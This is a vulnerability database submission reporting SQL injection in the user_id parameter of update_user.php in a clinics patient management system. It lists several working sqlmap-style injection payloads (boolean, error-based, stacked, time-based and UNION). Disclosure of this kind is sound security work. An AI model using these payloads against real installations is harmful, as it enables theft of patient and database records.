Enviar #94402: Sql injection exists in uesr_id parameter of clinics patient management systeminformación

TítuloSql injection exists in uesr_id parameter of clinics patient management system
DescripciónSQL injection vulnerability exists in user_id parameter of update_user.php file of clinics patient management system.Using sqlmap to inject it, you can get the result of sql injection, which means that an ordinary user can obtain all the information in the database Payload:user_id=1 AND 6941=(SELECT (CASE WHEN (6941=6941) THEN 6941 ELSE (SELECT 3566 UNION SELECT 9483) END))-- - or user_id=1 AND GTID_SUBSET(CONCAT(0x7162627171,(SELECT (ELT(8867=8867,1))),0x716b626271),8867) or user_id=1;SELECT SLEEP(5)# or user_id=1 AND (SELECT 6696 FROM (SELECT(SLEEP(5)))VRDq) or user_id=-8122 UNION ALL SELECT NULL,CONCAT(0x7162627171,0x4f4f756e4c68676444704b75576d6e4b666b6c71684e7674445179666a7166676f5664484b4f4c4d,0x716b626271),NULL-- -
Fuente⚠️ https://github.com/E1CHO/cve_hub/blob/main/clinics%20patient%20management%20system/clinics-patient-management-system%20vlun2.pdf
Usuario
 SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936)
Sumisión2023-02-25 04:42 (hace 3 años)
Moderación2023-02-25 08:47 (4 hours later)
EstadoAceptado
Entrada de VulDB221784 [SourceCodester Clinics Patient Management System 1.0 update_user.php user_id inyección SQL]
Puntos20

AnteriorVisión De ConjuntoPróximo

Want to stay up to date on a daily basis?

Enable the mail alert feature now!